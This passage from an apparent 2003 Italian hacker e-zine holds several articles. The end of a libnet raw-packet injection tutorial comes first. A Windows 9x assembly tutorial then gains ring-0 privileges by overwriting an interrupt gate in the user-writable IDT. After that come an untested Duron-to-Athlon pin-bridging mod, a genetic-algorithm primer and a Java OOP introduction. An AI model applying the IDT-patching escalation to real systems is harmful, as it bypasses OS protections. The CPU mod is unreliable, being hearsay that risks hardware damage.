      libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d bytes\n", n);
   else
      printf("construction and injection completed, wrote all %d bytes\n", n);

 /* CLEANUP */
   if (libnet_close_raw_sock(network) == -1)
      libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close interface\n");

 /* FREE packet stuff */
   libnet_destroy_packet(&packet);

   return (n == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
 }
---Conclusione------------------------------------------------------------------


Siamo giunti dunque alla fine, l'argomento è stato trattato e spiegato, in  modo
completo,  privo  di  approfondimenti specifici, poichè  avrebbero  reso  questo
semplice tutorial, un libro di centinaia di pagine, posso solo augurarvi un buon
proseguimento,  e  ricordarvi che con una semplice  ricerca  su  google,  potete
trovare  tutto  quello che qui non ho spiegato, altrimenti esistono  moltissimi,
libri cartacei, probabilmente trovabili anche sotto forma di e-books. Primo  tra
questi,  Internetworking with TCP/IP, formato da solo un volume ma  completo  di
tutto  quello  che  vi  serve  per approfondire questo  l'argomento  di   questo
tutorial, altrimenti c'era un libro in italiano formato da 3 volumi, ma ora  non
ricordo  ne  l'autore, ne il libro.. Posso quindi chiudere questo  scritto,  per
qualsiasi problema mandatemi una e-mail a webmaster@eviltime.com, o visitate  il
mio sito www.eviltime.com, dove potrete trovare altro mio materiale, e materiale
di terzi utile comunque, alla pratica di computer security, e studi simili.

--------------------------------------------------------------------------------



+--------------------------------------------------------------[open the file]-+
|[ OVERCLOCK ]                                                                 | 
|-- Scendere a Ring Zero in Windows9x                                          | 
|-- active85k <active85k@hotmail.com>                                          |
|                     _________________________________________________________| 
|____________________/ 
Assembly - Scendere a Ring Zero in Windows9x
[l’esempio lo trovi negli allegati -> DRx.exe]

Tools usati:
masm32 v7.0 (ma va bene qualsiasi versione)
Un cervello pronto a ricevere dati ;)

Si parte:
Sicuramente avete già sentito parlare di "Ring Zero" e avete deciso di capire di
cosa  si  tratta. Una cosa è certa: non si tratta del famoso sito  internet!  E'
invece uno stadio che può assumere il processore. Nei processori Intel, ci  sono
4 livelli di protezione (Ring3, Ring2, Ring1 e Ring0). Questi livelli sono stati
implementati  nel caso che il sistema operativo volesse proteggere  alcuni  suoi
delicati punti. Di fatto, questo, in Windows accade. Anche se ci sono 4 livelli,
la mamma Microsoft ha deciso di utilizzarne 2:

    Ring3: User Mode  ;Livello con i privilegi più bassi
    Ring2: Not used
    Ring1: Not used
    Ring0: Kernel Mode  ;Potere assoluto ;)

Come  potete vedere, sono utilizzati solo il Ring3, ossia lo stadio  normale  in
cui  noi  utenti  eseguamo istruzioni, e il Ring0, in cui le istruzioni  vengono
eseguite come se fosse il kernel a mandarle, quindi, senza restrizioni di  alcun
tipo  (l'esempio visualizza il contenuto dei registri di debug, accessibili solo
a ring0). Windows, permette a noi utenti di creare delle applicazioni con codice
a  Ring0,  ma,  per fare questo, l'eseguibile dovrebbe utilizzare  una  VXD  per
prendere la funzione a r0. Ma... scrivere una VXD è faticolo e anche lungo!  Che
palle!  Non  possiamo  ogni  volta scriverci un driver!!  Quindi...  utilizziamo
qualche  trucchetto! ;) Esistono vari metodi per utilizzare codice a  Ring0:  ad
esempio  si  potrebbe creare un thread e cambiarne le impostazioni  in  modo  da
farle   coincidere   con  quelle  del  ring0;  oppure,  si   potrebbe   chiamare
un'interruzione  che esegue una nostra determinata procedura  a  ring0!  Infatti
faremo  proprio così! Dobbiamo, infatti, personalizzarci un interrupt! Chiamando
la  nostra  procedura  attraverso un interrupt, possiamo fare  in  modo  che  le
istruzioni vengano eseguite da ring0. Per fare questo, bisogna conoscere un  po'
di   teoria.  Tutte  le  interruzioni  sono  "elencate"  all'interno  della  IDT
(Interrupt  Descriptor  Table),  che  utilizzeremo  per  raggiungere  il  nostro
interrupt.  Fortunatamente, da Windows9x (vale a dire  95/98/98SE/ME  -  NON  IN
WindowsNT),  in  User  mode, si può leggere/scrivere  a  piacimento  nella  IDT.
Sfrutteremo proprio questo "punto debole" per scendere a ring0. Vediamo  un  po'
come  funziona  la cosa! Prima di tutto, dobbiamo accedere alla IDT.  La  IDT  è
puntata da una struttura a 6 byte (FWORD). Una volta ottenuto il puntatore  alla
IDT  (tramite  l'istruzione "sidt"), dobbiamo personalizzare il gate  descriptor
che  verrà  utilizzato  dal nostro interrupt. Giustamente  mi  chiedete  <<  che
diavolo  è  'sta roba? >>, e avete ragione, quindi, spieghieremo  anche  questo:
ogni  interrupt ha dei "settaggi" (come ad esempio la procedura da  eseguire,  i
privilegi  da  usare, ecc...). Queste "impostazioni" staranno  pur  inserite  da
qualche  parte!  Bene! Si trovano infatti nel Gate! Adesso  il  problema  è  che
dobbiamo  settare le impostazioni giuste affinché la nostra interruzione  esegua
la  nostra procedura a r0. Per questo, dobbiamo capire com'è formato un gate. E'
una struttura a 64 bit, e somiglia un po' a 'sto disegno qua:
 Low-Word Offset | DDPPP01110000RRRLL | Segment Selector | High-Word Offset
I  quattro  spazi  sono 4 WORD (= 64 bit). La prima (contando  da  destra  verso
sinistra) e la quarta WORD vanno insieme: la prima WORD deve contenere  la  WORD
alta  dell'indirizzo  del  nostro Exception Handler (=  procedura  che  vogliamo
eseguire),  mentre  la quarta WORD, deve contenere la WORD bassa  dell'indirizzo
dell'Exception  Handler.  Quindi,  ottenuto  l'indirizzo  della  procedura   che
vogliamo  eseguire a ring0, dobbiamo tagliarlo in due! La seconda WORD  contiene
il Segment Selector, che è il punto in cui risiede la nostra procedura (a questa
WORD  imposteremo sempre il valore 028h poiché è un segment che punta sempre  ad
un  codice a ring0). La terza WORD, invece, contiene... un mucchio di schifezze!
Che è! Che sono tutte quelle lettere? Oddio! So' diventato pazzo! ;) No, non  vi
preoccupate, è tutto normale! Sono 16 spazi. Ogni spazio corrisponde ad un  bit.
Questi  bit devono essere impostati in modo corretto. Vediamo dunque di  che  si
tratta  (se volete una descrizione completa al 100%, dovete consultare il  terzo
volume del manuale della Inter, scaricabile direttamente da questo sito).

P = Bit present
DPL = Sono i due bit che determinano il livello di privilegio
R = E' riservato! La Intel non ha pubblicato alcuna documentazione su questi bit!

Ora  che  sappiamo  com'è fatto un Gate, dobbiamo scegliere  un'interruzione  da
usare.  E' consigliabile sceglierne una non usata dal sistema per evitare  guai!
;)  Sotto Windows9x, la 9h è liberissima (infatti è quella comunemente usata per
questi  scopi)! L'unica cosa che dobbiamo sapere è che i 2 DPL devono  assumere,
come  valore,  '3', perché stiamo chiamando da ring3. Quindi la  WORD  impostata
sarà  11101110000000  (che, in esadecimale, corrisponde  a  0EE00h).  Finalmente
sappiamo tutto! Impostiamo quindi la struttura che conterrà in nostro Gate!
    
 NewGate WORD 0      -> High-Word dell'offset della nostra r0proc
             WORD 028h   -> Segment Selector
             WORD 0EE00h -> Word n3 impostata correttamente ;)
             WORD 0      -> Low-Word dell'offset della r0proc

Vediamo adesso come agire:
1.  Salviamo il gate originale del sistema
2.  Lo sostituiamo con il nostro gate
3.  Eseguiamo la nostra interruzione
4.  Una volta finito, ripristiniamo il gate originale (precedentemente salvato)

Non è difficile! Adesso, manca solo il programma! Hmmm... riflettendo, questo  è
un  altro  problema! Se non sapete che cosa fare a ring0... è inutile  scendere!
Comunque, da ring0 sono accessibili altri registri, come i registri di controllo
(CRx)  o  i registri di debug (DRx). E inoltre, avete accesso a tutta la memoria
usata  da  tutto  il sistema operativo (mentre a ring3 avete accesso  solo  alla
memoria  utilizzata  dal  processo corrente). Saputo  questo,  documentatevi  su
qualcosa  che  vi  interessa  e  sfruttate  il  ring0  per  sviluppare   qualche
applicazioncina.  Come  banale  esmpio,  visualizzeremo  il  contenuto  del  DR7
(l'ottavo registro di debug: ricordate che questi registri sono accessibili solo
mediante  una MOV, sia in scrittura che in lettura, quindi, per qualsiasi  altra
operazione, dovete spostarne il contenuto in un normale registro).

 
-[RING0.asm]---------------------------------[taglia qui]-----------------------

.386
.model flat, stdcall
option casemap: none
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib

.data
    MyIDT FWORD 0    ;Struttura a 6 byte per la IDTR Table
    OldGate QWORD 0  ;Qua salveremo, temporaneamente, il gate originale
    NewGate WORD 0
            WORD 028h
            WORD 0EE00h
            WORD 0

.code
Main:
  mov     eax, offset r0proc
  mov     [NewGate], ax    ;Impostiamo la prima WORD dell'offset dell'handler
  shr     eax, 16
  mov     [NewGate+6], ax  ;Impostiamo la seconda WORD dell'offset dell'handler

  sidt    MyIDT            ;Ritiriamo la IDTR Table

  mov     ebx, dword ptr [MyIDT+2]  ;Prendiamo il base addr della IDT
  add     ebx, 8*9                  ;Adesso EBX punta all'int 09h

  mov     edi, offset OldGate  ; Con queste quattro righe, salviamo l'attuale
  mov     esi, ebx             ; gate nella QWORD 'OldGate', che ci servirà
  movsd                        ; dopo per ripristinare le impostazioni di
  movsd                        ; partenza!

  mov     edi, ebx             ; Con questo codice, invece, inseriamo il nostro
  mov     esi, offset NewGate  ; gate al posto di quello esistente. Dopo aver
  movsd                        ; fatto ciò, siamo pronti per eseguire la nostra
  movsd                        ; interruzione!

  int     09h                  ;Genera l'Exception Handling =)

  mov     edi, ebx             ; Il numero è perfettamente riuscito!
  mov     esi, offset OldGate  ; Dopo che è stata eseguita l'interruzione,
  movsd                        ; ripristiniamo il gate originario!
  movsd                        ;

  push    0
  call    ExitProcess

r0proc PROC                     ;La nostra procedura a ring0!
        mov     eax, dr7
        iretd

r0proc Endp                  ;Subito dopo l'int, EAX conterrà il valore del DR7!

End Main
----------------------------------------[taglia qui]----------------------------

Ecco  qua! Abbiamo finito il nostro programmino! Ci tengo a precisare che questo
NON  è  il  modo  ordinario per scendere a ring0 (perché, come detto  prima,  si
dovrebbe  scrivere  la  VXD), però... è sicuramente meno faticoso  e  anche  più
divertente! ;) Inoltre, questo sistema NON funziona sui sistemi NTlike  (vale  a
dire  WindowsNT, Windows2000 e WindowsXP) perché non permettono  l'accesso  alla
IDT  da parte del ring3. Fatto questo, mi raccomando che non usiate 'sto sistema
per fare danni... e vi saluto!
[active85k]
Disclaimer:  Il  contenuto di questa pagina ha il solo scopo  informativo  e  di
miglioramento del linguaggio assembly. L'autore declina qualsiasi responsabilità
circa l'uso improprio che può esser fatto di questo tutorial. OK? :D



+--------------------------------------------------------------[open the file]-+
|[ OVERCLOCK ]                                                                 | 
|-- Da Duron a Athlon XP                                                       | 
|-- Cyberdude <cyberdudeIL@libero.it>                                          |
|                     _________________________________________________________| 
|____________________/ 
Ciao  a  tutti ragazzi … hehehe vi sembra strano vedere questo titolo attribuito
al  mio nick vero? Beh si! È il mio primo articolo trattante overclock quindi vi
prego  di  perdonarmi eventuali erroracci da principiante o cose del genere  (se
sono  poco  chiaro … scusateeeeee)!! Comunque se poi ne esce qualcosa  di  buono
fuori è tutto guadagnato no? Bene bene devo dire che l’overclock è una cosa  che
mi ha sempre interessato molto ma non ho mai avuto i mezzi per studiarmelo … ora
ho  trovato  dove e come studiarlo (ho conosciuto persone che fanno  questo  per
professione)  e  allora…  da cosa nasce cosa ed eccomi  qui!!  Eccoci  al  primo
articolo!!  Si comincia, vorrei parlarvi di come (teoricamente perché  non  l’ho
provato ma così mi è stato riferito) possiamo trasformare un Duron in Athlon  XP
!!  Ma prima di passare alla messa in atto vorrei prima parlarvi un po’ di Duron
e  Athlon  XP … perché se non sapete neanche di che stiamo parlando come  potete
seguirmi??  Eheheh  giusto!!  Dunque  AMD  Athlon  XP  è  il  nome  dell'attuale
processore  della società AMD, antagonista del processore Intel  Pentium  IV.  È
dotato di un socket A (detto anche socket 462 per il numero di pin) sulla scheda
madre  ed è un processore di settima generazione!! A sua volta l’ AMD Athlon  XP
possiamo  dividerlo in Palomino e Thoroughbred … non abbiate paura,  ora  ve  lo
spiego:

Il  "Palomino"  (fino all'AMD Athlon XP 2100+) è composto  da  37,5  milioni  di
transistor operanti e dotato di una cache L1 di 128 kilobyte o di una  cache  L2
integrata  di 256 kilobyte. Il Front Side Bus delle versioni attuali  è  di  266
MHZ.  Il processore AMD Athlon XP dispone dell'esclusiva tecnologia QuantiSpeed,
che aumenta la performance del processore ed esegue moltissime operazioni in più
in minor tempo!
  
Il  "Thoroughbred" (AMD Athlon XP a partire da 2000+) è il primo processore  AMD
per  PC  desktop, costruito con la tecnologia a 0,13 micron. Il nuovo processore
AMD  XP 2200+ offre maggiori prestazioni, minor consumo di corrente e una minore
superficie del chip. Inoltre è compatibile con l'infrastruttura AMD socket  A  e
permette quindi un "upgrade" semplice ed economico dei PC.

Per  eventuali curiosità personali, i processori AMD Athlon XP vengono  prodotti
nello stabilimento di Dresda, in Germania!! Ma comunque meglio non andare troppo
fuori  traccia heheheh che vi posso dire sul Duron?? Beh il processore AMD Duron
si  basa  sulla  stessa innovativa architettura del processore  AMD  Athlon.  La
principale  differenza consiste nella minore dimensione della memoria  cache  di
192  kilobyte.  Il  processore  AMD  Duron è stato  studiato  appositamente  per
garantire   prestazioni  e  funzionalità  durature  nel  tempo  agli  acquirenti
oculati!! Detto questo passiamo alla parte più interessante del nostro articolo.
Dunque la serie di processori Athlon XP sarà  con core Thorton, una versione  di
Barton  con soli 256KB di cache L2. Quindi, noi studieremo la trasformazione  di
Thorton in Barton (naturalmente penso lo scopo l’abbiate capito eheheh) a  parte
questo  è probabile che dopo aver letto fin qui vi è venuto un bel mal di  testa
perché  non  conoscete  alcuni  dei termini  sopra  citati!!   Quindi  prima  di
proseguire  passiamo a qualche altra delucidazione (sia chiaro che lo  metto  in
questo  articolo ma se scriverò altri articoli sull’overclocking  non  torno  su
questi  argomenti ok??? :p) Dunque penso che le parole difficili siano  state  :
“cache”  e  “core” giusto?? Allora, il cache è la memoria deputata  a  mantenere
programmi e dati per permettere un accesso rapido ad essi senza la necessità  di
richiamarli.  Il Core invece è il nucleo centrale, la parte più  importante  che
segue  i  calcoli  e  le funzioni principali. Ok??? Bene detto  questo  possiamo
procedere (spero)  … ragazzi che dirvi se serve altro o venite a chiedermelo  in
chan  o  cercate  in rete ok?? Adesso passo ad illustrarvi un piccolo  schema  …
quello  che vi illustro è il bridge L2 voi ora vi chiederete cosa sia il  bridge
eheheh  non  è  il  gioco  di carte ragazzi … il bridge  è  un  termine  inglese
utilizzato per indicare un'apparecchiatura che sposta i pacchetti tra i segmenti
multipli  di una rete utilizzando lo stesso protocollo di comunicazione.  Se  un
pacchetto  è  destinato ad un utente situato nello stesso segmento di  rete  del
mittente,  il bridge mantiene il pacchetto a livello locale. Se il  pacchetto  è
invece destinato ad un altro segmento, il bridge lo passa ad un'altra dorsale di
rete.  Il bridge opera al livello 2 (Collegamento Dati) del modello OSI.  (Negli
allegati  c’è  l’immagine  Durton.jpg)  …  Seguendo  l’immagine  cosa  notiamo??
solamente  una  piccola differenza: sul processore Duron  un  bridge  L2  non  è
chiuso.  Collegando,  quindi,  i due pin illustrati  in  figura,  il  processore
dovrebbe  funzionare  correttamente  con 256KB  di  cache  L2…  A  questo  punto
l’articolo giunge a termine! La cosa da precisare a questo punto è una :  non  è
possibile assicurare, dopo tale modifica, il corretto funzionamento di  tutti  i
processori Duron, in particolare sono noti problemi di stabilità anche nel  caso
in  cui  venga  disabilitata da BIOS la voce L2. Pare,  inoltre,  che  un  altro
processore operi correttamente e stabilmente sia con 256KB di cache  L2  sia  in
condizione di overclock. Quindi wagliù … volete sperimentare? Fate pure ma  dopo
non venite da me a dire che non vi funziona + niente ok?? Io vi ho precisato che
non  è  sicura  la  riuscita!  Ora vi saluto e vi do  appuntamente  al  prossimo
articolo che vi prometto sarà più chiaro eheheheh sono alle prime armi :)
Ciao a tutti
Cyberdude


+--------------------------------------------------------------[open the file]-+
|[ PROGRAMMAZIONE ]                                                            | 
|-- Algoritmi genetici Parte Prima                                             | 
|-- Imperiorx <imperiorx@libero.it>                                            |
|                     _________________________________________________________| 
|____________________/ 
Algoritmi genetici (Parte Prima)
 =================================

Author: Imperiorx
Member of UIHA crew, Research & Development
www.uiha.tk



1) Introduzione
2) Struttura dell'algoritmo genetico
3) Codifica e decodifica del problema
4) Struttura dell'algoritmo genetico
5) Definizione individuo
6) Inizializzazione della popolazione
7) Selezione della popolazione




 INTRODUZIONE
 ============

L'evolutionary  Computation è il termine generale che include diverse  techniche
di  programmazione  basate  in  buona  misura  sull'analogia  con  i  meccanismi
evolutivi degli organismi biologii nel mondo naturale.

Ma che cosa sono gli Algoritmi Genetici ?

Gli algoritmi genetici sono metodi informatici di ricerca basati sulla selezione
naturale  e sul paragone con la genetica osservata in natura. Essi combinano  la
sopravvivenza del più forte con lo scambio di conoscenza strutturata per formare
un  algoritmo  di ricerca innovativo. In ogni generazione, un nuovo  insieme  di
creature  artificiali (stringhe) viene creato usando pezzi  dei  migliori  della
generazione  precedente.  Occasionalmente  vengono  provate  parti   nuove   per
introdurre possibili miglioramenti.

Gli  algoritmi  genetici sono stati introdotti dal gruppo  di  ricerca  di  John
Holland  dell'Università  del  Michigan. L'obiettivo  delle  loro  ricerche  era
duplice:  - astrarre e spiegare in modo rigoroso il processo di adattamento  dei
sistemi  naturali;  - progettare sistemi software che mantengano  il  meccanismo
naturale.

Questo approccio ha portato a scoperte importanti nelle scienze naturali  e  dei
sistemi  artificiali.  Nonostante siano basati sulla  casualità,  gli  algoritmi
genetici  non  sono  una semplice ricerca casuale; essi esplorano  efficacemente
informazioni  storiche per dedurre nuovi punti di ricerca che  abbiano  migliori
caratteristiche.    Essi   appartengono   alla   categoria    degli    algoritmi
probabilistici,  ma  sono  molto  differenti  dagli  algoritmi  casuali,  perché
combinano  elementi di ricerca stocastica e ricerca guidata;  proprio  grazie  a
questo, sono molto più robusti dei metodi esistenti di ricerca mirata.

La  principale monografia sull'argomento è Adaptation in Natural and  Artificial
Systems,  di  Holland  (1975), e molti altri lavori comprovano  la  validità  di
questa  tecnica  per  l'ottimizzazione  di  funzioni  e  nelle  applicazioni  di
controllo.  Dopo  essersi affermati come un valido approccio  per  problemi  che
richiedono  una  ricerca  efficiente,  gli algoritmi  genetici  stanno  trovando
applicazione in campo ingegneristico, scientifico ed economico. Le  ragioni  che
stanno   dietro   a   questo  successo  sono  chiare:  questi   algoritmi   sono
computazionalmente semplici, ma potenti nella loro ricerca del miglioramento, ed
inoltre  non  sono limitati da assunzioni restrittive riguardo  allo  spazio  di
ricerca;  come  continuità,  derivabilità ed altro.  In  campo  finanziario  gli
algoritmi  genetici vengono applicati con profitto su problemi di ottimizzazione
di portafoglio.



 STRUTTURA DELL'ALGORITMO GENETICO
 =================================


La  struttura  di  un  algoritmo genetico classico, non è  altro  che  un  ciclo
controllato  da una condizione termine, all'interno del quale viene simulata  la
mitosi di un cromosoma nel mondo naturale.

Non  sempre  abbiamo a disposizione un metodo o una formula che ci  permetta  di
raggiungere  la  soluzione  esatta, o perchè  la  soluzione  può  essere  troppo
complessa,  oppure perchè il tempo di calcolo è troppo eccessivo. Gli  algoritmi
genetici,  però, non sono dei semplici metodi ricorsivi, dove la  ricerca  della
soluzione  avviene  per interazione di un singolo valore ( dal  momento  che  la
ricerca  avviene  in  modo parallelo, utilizzando una popolazione  di  possibili
soluzioni. )

Ciascun   individuo  sarà  rappresentato  da  una  matrice  che   raffigura   la
schematizzazzione  di  un  cromosoma comprendente  le  caratteristiche  di  quel
particolare membro della popolazione.

Ma  se abbiamo una popolazione di soluzioni...come facciamo a prendere la scelta
giusta  ?  Bisogna operare una schematizzazione della problematica che si  vuole
affrontare  o del processo che si desidera ottimizzare. Quindi la ricerca  della
soluzione  avviene attraverso una schematizzazione del problema e la  successiva
decodifica del migliore individuo della popolazione.

Riporto di seguito un esempio di schematizzazione:

 +----------+
 | PROBLEMA |
 +----------+
     |
     |
     |
 +----------+
 | CODIFICA |
 +----------+
     |
     |                                                       +------------+
     |                      +---------------------+--------> | DECODIFICA |
 +---------------+          | ALGORITMO GENETICO  |          +------------+
 | PROBLEMA      |          |                     |                |
 | SCHEMATIZZATO |--------> |                     |                |
 +---------------+          | Popolazione di      |                |
                            | possibili soluzioni |          +-----------+
                            +---------------------+          | SOLUZIONE |
                                                             +-----------+




 CODIFICA E DECODIFICA DEL PROBLEMA
 ===================================

Come in natura, il nostro cromosoma avrà per ogni individuo la stessa struttura,
sarà  quindi  portatore  di  informazioni che riguardano  gli  stessi  caratteri
ereditari. Ogni cromosoma poi trasmette diverse migliaia di caratteri ereditari,
dobbiamo  quindi essere pronti a codificare le sfumature della problematica  che
stiamo  affrontando. Come già sappiamo in natura i cromosomi variano  a  seconda
del  tipo  di  cellula (46 per quella umana, 8 per quella del moscerino,  mentre
altri  organismi  possono avere centinaia di cromosomi) L'algoritmo  restituisce
uno  o  più  individui che vengono selezionati tra i migliori della popolazione,
secondo  criteri di selezione che definiremo più avanti. Dovremo quindi  operare
la  decodifica  del cromosoma di questi "Super Individui" che  rappresentano  la
soluzione  del nostro problema. La decodifica consente di estrarre la  soluzione
vera  e  propria, di applicarne le conclusioni, oppure di stabilire i  parametri
ottimi di un processo.



 STRUTTURA DELL'ALGORITMO GENETICO
 ==================================

Bisogna quindi definire in linea generale il modo di operare



Procedure Algoritmo_Genetico(Var Popolazione:
               Tpopolazione, Var Soluzione:TIndividuo);
Var T:Integer;
Begin
  T:=0; Inizializzazione(Popolazione(T));
  Selezione(Popolazione(T),Soluzione);
  While Not (CondizioneTermine) do Begin
        T:=T+1
        Seleziona (Popolazione(T),Popolazione(T-1));
        Crossover(Popolazione(T));
        Mutazione(Popolazione(T));
        Selezione(Popolazione(T),Soluzione);
  End;
End;



In  questa fase opereremo un esame di come operano questi algoritmi. Come si può
notare,  la struttura della procedura "Algoritmo_Genetico" descritta  sopra  può
essere  scomposta in alcune parti fondamentali. La struttura dati è, ovviamente,
fondamentale  per  il  raggiungimento della soluzione,  ma  per  il  momento  ci
limitiamo  a sviluppare un metodo che sia indipendente dal problema. Se  abbiamo
detto che la convergenza verso un valore è piuttosto veloce, abbiamo tuttavia il
rischio che l'insieme di individui convergano verso un massimo locale invece che
verso quello assoluto.



 DEFINIZIONE INDIVIDUO
 ======================

Definiremo  come "Individuo" la rappresentazione matematica della soluzione  del
nostro  problema, individuata da una matrice di valori raffiguranti i  geni  del
cromosoma  dell'individuo stesso. In altre parole, ogni elemento della  matrice,
avrà un particolare significato, proprio come lo hanno i geni del nostro DNA: la
lunghezza e la struttura del cromosoma dell'individuo dipenderà strettamente dal
problema,  al  contrario  dell'algoritmo che avrà la  caratteristica  di  essere
indipendente da esso.


 Type
 TIndividuo:      Array of Gene;


La  definizione  di  "GENE" dipenderà a questo punto dal problema  e  dalla  sua
codifica.  Si è discusso a lungo sulla eventualità di definire la struttura  del
cromosoma come una stringa di valori binari, piuttosto che reali: l'utilizzo  di
stringhe  binarie  ha  una  serie  di  svantaggi  quando  applicate  a   sistemi
multidimensionali dove è richiesta una precisione numerica. In u sistema con 100
variabili   reali,  per  esempio,  a  48  bit  definite  nel  dominio  (2.9x10*-
39..1.7x10*38) la lunghezza di un vettore binario sarebbe di 4800 bit  per  ogni
individuo della popolazione, fatto che ci porta velocemente, per una popolazione
di  100  individui ad una struttura dati di quasi mezzo mega byte generando  uno
spazio  di  ricerca  enorme.  In  questo  caso  una  struttura  binaria  avrebbe
prestazioni  mediocri,  si dovrebbe ricorrere quindi a strutture  dati  diverse.
Vedremo  come utilizzare strutture dati binarie, riconducendoci allo  studio  di
algoritmi genetici classici.




 INIZIALIZZAZZIONE DELLA POPOLAZIONE
 ====================================

Nella  procedura  "Algoritmo_Genetico" che abbiamo introdotto, dobbiamo  innanzi
tutto   inizializzare   la   popolazione  iniziale   attraverso   la   procedura
"Inizializzazione(Popolazione(T)); La teoria classica degli  algoritmi  genetici
vuole che l'inizializzazione della popolazione avvenga in modo casuale, tuttavia
alcune  applicazioni  nelle  quali  si  vuole  creare  un  numero  di  individui
indirizzati  verso  una  soluzione parziale già nota può  essere  introdotta  in
questa  procedura. E' possibile quindi iniettare una aliquota di  SuperIndividui
nella  popolazione  iniziale  al  fine di velocizzare  il  raggiungimento  della
soluzione.   Vedremo  come  analizzare  gli  algoritmi  genetici   che   vengono
inizializzati  in  modo casuale, così facendo potremo vedere  alcune  variazioni
interessanti  nel  comportamento  dei nostri programmi,  al  variare  di  alcuni
parametri cardine, tra cui la popolazione iniziale.



 SELEZIONE DELLA POPOLAZIONE
 ============================

La  seconda procedura fondamentale che dobbiamo scrivere è quella che  opera  la
selezione  degli  individui  migliori  per  la  riproduzione  nella  generazione
successiva. Introduciamo a questo punto il concetto Fitness, inteso in senso più
generale   di  corrispondenza  alle  aspettative  nei  confronti  dell'individuo
migliore,  ossia  della  soluzione al nostro problema. La  soluzione  che  segue
prescinde  dalla  struttura  dati del cromosoma; la  valutazione  della  Fitness
dell'individuo avviene nella procedura:

 Selezione(Popolazione(T),Soluzione)

Il  codice  che  segue  rappresenta un esempio di  selezione  di  un  individuo,
estratto  dalla popolazione attuale per operare la riproduzione che  darà  luogo
agli  individui  di  quella successiva.  In questo caso la variabile  cardine  è
sumfitness  che rappresenta la somma della fitness di tutti gli individui  della
popolazione  corrente.  A  questo punto si procede a sommare  le  fitness  degli
individui  della  popolazione fino a quando questa somma non  supera  il  valore
casuale  calcolato.  Questa  operazione porta di fatto  ad  avere  una  maggiore
probabilità di selezionare un individuo con fitness elevata, piuttosto  che  uno
con  fitness  bassa:  inoltre  non  si estrarranno  mai  individui  con  fitness
negativa. In queste poche righe si racchiudono una grande potenza di calcolo.


 fuction select(popsize:integer; sumfitness:real; var
                                 pop:population):integer;
 var rand, partsum:real; j:integer;
 begin
  partsum :=0.0;j :=0;
  rand := random * sumfitness;
  repeat
   j := j+1;
   partsum := partsum + pop[j].fitness;
  until (partsum >= rand) or (j = popsize);
  select := j;
 end


Esistono  dei  casi in cui si deve procedere a fare competere gli  individui  in
modo  diretto,  ed in seguito associare un valore positivo al vincitore  ed  uno
negativo  al perdente. La selezione per confronto diretto porta alla convergenza
verso  un  massimo  locale, per cui in questo caso conviene  assicurare  che  un
aliquota   degli  individui  perdenti  vengano  comunque  selezionati   per   la
riproduzione  nella  generazione successiva, per assicurare  una  certa  varietà
nella struttura genetica della stessa.

Nella  seconda parte di questo tutorial vedremo come avviene il Crossover  e  la
mutazione.  Inoltre studieremo la creazione ed evoluzione della  generazione  di
individui per poi concludere la seconda parte con la ricerca dei massimi di  una
funzione.



          ::[Imperiorx]::

    ___  ___ ___ ___  ____       
    | |  | | | || |  | | \       
    | |  | | | || |__| |  \      
    | |__| | | ||  __  | @ \     
     \____/  |_||_|  |_|_|\_\    
                                 

::[ Research & Development ]::
::[ Stage2 @ 2003 ]::
::[ www.uiha.tk ]::


+--------------------------------------------------------------[open the file]-+
|[ PROGRAMMAZIONE ]                                                            | 
|-- Object Oriented Programming                                                | 
|-- SysOv3rrid3 <SysOverride@libero.it>                                        |
|                     _________________________________________________________| 
|____________________/ 
+-------------------------------+
+About the article...           +
+-------------------------------+
+ AuTh0r: Sys Ov3rrid3          +
+ TitLe:  Java OOP              +
+ E-mail: SysOverride@libero.it +
+ CrEw:   InfomazioneLibera     +
+ sUondtR4cK: Muse - Absolution +
+                               +
+-------------------------------+


*_____________*
| DESCLAIMER  |
*_____________*

Tutte  le  informazioni  contenute  in  questo  file   sono   a    puro    scopo
didattico/informativo,  quindi l'autore non si ritiene  responsabile  per  l'uso
improprio da parte di terzi delle informazioni qui contenute.


+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
+ Sommario                      +
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
+ 1.  Introduzione all'OOP      +
+ 2.  L'OOP in Java             +
+ 2.1 Classi, Attributi e Metodi+
+ 3.  Ereditarietà              +
+ 4.  Le Stringhe               +
+ 5.  Considerazioni finali     +
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+

Hello   people!!!  Rieccoci  qui  pronti  per  parlare  di  un  nuovo  argomento
riguardante  il  Java,  quello della programmazione ad  oggetti,  caratteristica
principale  di  questo linguaggio che si sta affermando sempre di  più.  Quindi,
saltando  tutti i convenevoli della situazione, iniziamo subito  con  una  breve
(dico breve, perché l'argomento è così vasto e per certi versi complesso che non
ho  le  competenze per affrontarlo interamente),introduzione del paradigma della
programmazione  ad  oggetti.  Il  paradigma della  programmazione  agli  oggetti
(conosciuto anche come OOP), si è sviluppato con la diffusione dei linguaggi C++
e  Java, e a differenza del paradigma imperativo(vedi C, Pascal, ecc.); si  pone
in  maniera  differente di fronte alla risoluzione del problema. In  particolare
secondo l'ottica OOP si deve pensare al problema in termini di SISTEMA, composta
da diverse entità(OGGETTI) che interagiscono tra loro scambiandosi dei messaggi.
Quindi  alla base del concetto di OOP abbiamo gli OGGETTI, per capire cosa  sono
basti  pensare ad un comune oggetto, per esempio un libro: ogni oggetto ha delle
caratteristiche/proprietà,  e allo stesso tempo può assumere  dei  comportamenti
che  tendono  a  modificarne il comportamento/stato. Ritornando all'esempio  del
libro  le sue caratteristiche possono essere: il numero delle pagine, il titolo,
il  colore della copertina, ecc.; mentre i suoi comportamenti: può essere chiuso
o  aperto, si possono sfogliare o strappare le pagine, ecc. Secondo IL DIAGRAMMA
DEGLI OGGETTI lo potremmo rappresentare nel seguente modo:

+++++++++++++++++++
+ Libro1          +   <---- Nome Oggetto
+++++++++++++++++++
+ Numero pagine   +
+ Titolo          +   <---- Caratteristiche
+ Colore copertina+
+++++++++++++++++++
+ Apri libro      +
+ Chiudi libro    +   <---- Comportamenti
+ Gira pagina     +
+ Strappa pagina  +
+++++++++++++++++++

Teorizzando quanto detto sinora le caratteristiche che ha un oggetto prendono il
nome di ATTIBUTI, e i comportamenti il nome di METODI. Riguardo quindi l'OOP gli
oggetti rappresentano il concetto di INCAPSULAMENTO, che consiste nella capacità
dell'oggetto  di  incorporare in se stessi gli attributi  e  i  metodi  che  gli
